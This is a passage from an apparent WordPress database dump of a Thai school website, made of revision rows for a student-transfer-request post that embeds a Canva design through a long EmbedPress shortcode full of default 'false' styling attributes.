align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view[/embedpress]','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-03 09:43:31','2025-07-03 02:43:31','',1623,'http://pakhaeng.ssk.in.th/?p=1631',0,'revision','',0),
(1632,1,'2025-07-03 09:44:53','2025-07-03 02:44:53','[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'519\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' 